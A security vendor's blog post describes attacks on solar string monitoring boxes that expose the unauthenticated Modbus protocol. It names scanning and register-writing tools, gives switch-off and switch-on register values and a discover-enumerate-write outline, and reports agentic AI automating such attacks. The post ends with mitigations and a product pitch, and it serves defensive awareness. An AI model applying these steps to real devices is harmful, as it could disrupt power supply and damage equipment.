Cyberattack on the Sun: Threat Actors Manipulate Solar Panel Systems; Agentic AI Increases the Risk

Millions of homes, businesses, and hospitals depend on solar power, a clean and cost-effective source of renewable energy. Adoption has accelerated worldwide thanks to major government initiatives such as the Inflation Reduction Act (IRA) in the U.S., the Renewable Energy Directive (RED II) in the EU, the Smart Export Guarantee in the UK, and Australia’s Small-scale Renewable Energy Scheme (SRES). As clean energy infrastructure expands, a new vulnerability is emerging. Many operational technology (OT) systems, including SCADA controllers and string monitoring boxes, still use the decades-old Modbus protocol, which lacks authentication and encryption, leaving critical equipment exposed online. 

Our Cato CTRL and MDR teams have observed large-scale reconnaissance and exploitation attempts targeting Modbus devices, including string monitoring boxes that directly control solar panel output. In such cases, a threat actor with nothing more than an internet connection and a free tool could issue a simple command, “SWITCH OFF,” cutting power on a bright, cloudless day. What once required time, patience, and manual skill can now be scaled and accelerated through automation. With the rise of agentic AI tools, attackers can now automate reconnaissance and exploitation, reducing the time needed to execute such attacks from days to just minutes, turning the clean energy revolution into the next cyber battlefield.

The Hidden Weak Spot in Solar: Monitoring Boxes 

To understand why such reconnaissance and manipulation attempts occur, let’s first dive into some basic terms in the renewable energy sector:

• Solar Panels (PV Modules): Capture sunlight and generate electricity. 
• Strings: Groups of panels connected together. 
• String Monitoring Box (Combiner Box): A device that collects power from several strings, measures performance, and lets operators send remote commands (like switching sections on/off).
• SCADA System → The “brain” of the operation. It collects all this information from the monitoring boxes across the farm and provides a single dashboard for operators to:
  • Track power generation. 
  • Detect faults or underperforming panels. 
  • Send commands back down (like disconnecting a string or rebalancing loads).

In Figure 1, we illustrate the String Monitoring Box connection to PV modules and Scada systems and a high-level description of how threat actors target such environments.

From a cyber risk perspective, the monitoring box is the weak point because it speaks Modbus (no security). If a threat actor compromises it, they can send commands as if they were the SCADA system, essentially hijacking the control path.

These boxes are critical for efficiency, safety, and uptime. But many solar systems still use Modbus, a decades-old industrial protocol designed for reliability, not security, and we have seen in the wild threat actors trying to target such devices.

Figure 1. Diagram of PV modules → strings → string monitoring box → SCADA system.

Why Modbus Is a Hacker’s Playground 

Modbus over TCP uses Port 502, which in too many deployments is left open to the internet. Unlike modern IT protocols, Modbus has:

• No authentication: Anyone who finds a Modbus device can talk to it.
• No encryption: Modbus commands and data are sent in plain text.
• Direct control: Attackers can read registers (such as, status and voltage) and write to them (such as, turning systems on/off).

Example for Real Commands that can be leveraged for Modbus registers manipulation for Solar Boxes:

• 0xAC00 = SWITCH OFF
• 0xAC01 = SWITCH ON

The Attacker’s Toolbox: How Modbus Devices Are Probed and Exploited

Unlike complex IT exploits, targeting Modbus is surprisingly simple. Threat actors often use publicly available tools, many of which were originally designed for engineers or researchers, to find and control exposed devices.

Nmap Modbus Scripts

Nmap, the popular network scanner, includes SCADA/Modbus NSE scripts:

• modbus-discover: Scans a host to detect if Modbus is running, listing devices on the network.
• modbus-read: Reads holding/input registers to fingerprint a device, revealing configuration or status values.
• modbus-check-unit-id: Enumerates valid Unit IDs (essentially device addresses) so attackers can map multi-device setups.

With just these scripts, attackers can identify what kind of OT device is online, which registers exist, and which ones are writable.

CLI Tools for Register Manipulation

Two widely used utilities – mbtget and mbpoll – let attackers (or engineers) query and modify Modbus registers from the command line.

• These tools make it trivial to read measurements (voltage, current, fault codes).
• More dangerously, they allow writing values to registers, e.g., sending a command to switch off a PV string.

Another tool, modbus-cli, written in Python, goes further:

• It enables manipulation of coils and registers directly.
• This is often used in labs for testing, but when exposed online, it gives attackers the same level of access an operator has.

Metasploit Modules

The Metasploit framework includes SCADA/Modbus modules:

• auxiliary/scanner/scada/modbus_client → Scans and enumerates Modbus devices, just like Nmap.
• auxiliary/scanner/scada/modbus_read → Reads register values for intelligence gathering.

Attackers can chain these with Metasploit payloads to automate large-scale scanning campaigns, fingerprinting hundreds of exposed solar devices in minutes.

Advanced Tools: Impacket & Fuzzers

• Impacket includes scripts that can be adapted for Modbus traffic manipulation.
• Modbus-fuzzer tools send malformed or rapid-fire queries, testing device resilience. Often, this reveals misconfigurations or causes devices to fail-open (resetting or defaulting to insecure states).

AI-Powered Attacks on OT: The New Frontier of Industrial Cyber Risk

The rise of HexStrike AI, an AI-driven offensive security framework, combines professional security tools with autonomous AI agents to deliver comprehensive security testing capabilities. However, it has also been reported to be used by threat actors, introducing a new dimension of risk for the renewable energy sector. It can potentially scan, fingerprint, and test industrial systems at a scale and speed that human operators cannot match.

For solar string monitoring boxes that expose Modbus over TCP (port 502), this presents a serious threat as it can perform the following actions at scale through automation:

• Automated Discovery: Directing tools like Nmap SCADA scripts to quickly identify devices speaking Modbus across wide IP ranges.
• Enumeration of Registers: By chaining tools like mbpoll or modbus-cli, it can automatically read device registers (voltage, status, unit IDs), building a detailed profile of the monitoring box.
• Command Injection: Once writable registers are found, it can attempt to issue control commands, for example, sending 0xAC00 = SWITCH OFF or 0xAC01 = SWITCH ON to toggle PV strings.
• Persistent Manipulation: With retry logic and adaptive decision-making, it could continue to push malicious commands until the device accepts them, potentially overriding operator inputs from the SCADA system.

In short, AI-powered attacks on OT devices allow attackers to behave like a rogue SCADA operator, but from anywhere in the world. Instead of manually probing devices, adversaries can use automation to:

• Discover exposed ports.
• Identify vulnerable string monitoring boxes.
• Exploit Modbus’ lack of authentication to hijack control.

This automation turns what once required skilled manual effort into a machine-speed attack vector. For solar farm operators, it means the time between exposure and compromise could shrink from weeks or days to mere minutes.

Why This Matters for Solar

Because Modbus registers map directly to device controls (examples from string monitoring boxes include registers like 30001, 30002, 40001, 40002), attackers with these tools don’t need zero-days. They can simply:

1. Discover the device on port 502.
2. Enumerate its registers.
3. Write values into those registers (e.g., 0xAC00 = SWITCH OFF).

In practice, this means a hacker could remotely toggle PV strings, disable monitoring, or destabilize production, all using free tools available on GitHub or in Kali Linux.

What’s at Stake

Leaving a solar monitoring system exposed isn’t a minor IT misconfiguration, it’s an operational risk with real-world consequences:

• Grid Instability: Turning off parts of a solar farm reduces supply at critical times.
• Financial Loss: Even short interruptions cost operators thousands in lost production.
• Safety: Rapid toggling can damage inverters or create fire hazards.

What CISA Recommends

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has repeatedly warned about insecure-by-design OT protocols like Modbus. Best practices include:

• Avoid exposing OT devices directly to the internet.
• Segment IT and OT networks.
• Monitor all traffic, internal and external. We have previously discussed it in the following blog post.

One Platform, Total OT Protection | Read the blog

How Cato Helps Secure Solar and OT Environments

The Cato SASE Platform gives renewable operators the protection Modbus never had:

• Open Port Alerts: We notify customers proactively when risky ports like 502 are exposed. (Example in Figure2)

Figure 2. alert on exposed Modbus port 502, rating the risk as high and guiding customers to close or narrow access rules.

• Device Inventory Dashboard: Visibility into every OT device and its communication flows. (Figure 3)

Figure 3. Device Inventory Dashboard

• Modbus Evenets Monitoring: Option to drill down and view modbus events in real time (Figure 4) 

Figure 4. Option to monitor closely Modbus events

• Block Modbus Port and segment OT and IT networks (Figure 5)

Figure 5. segment OT and IT networks

• Microsegmentation: Prevents attackers from moving laterally if they get in. (see our previous blog post about it).
• Threat Hunting: Our Cato MDR team continuously tracks Modbus scans and exploitation attempts in the wild and work directly with our customers when needed.

Conclusion

The renewable energy revolution is too important to be derailed by legacy risks. Yet as long as Modbus ports remain open, hackers have a remote “off switch” to the sun.

With proactive visibility, segmentation, and continuous monitoring, Cato ensures solar power remains a source of resilience, not a target of attack.

The post Cyberattack on the Sun: Threat Actors Manipulate Solar Panel Systems; Agentic AI Increases the Risk appeared first on Cato Networks.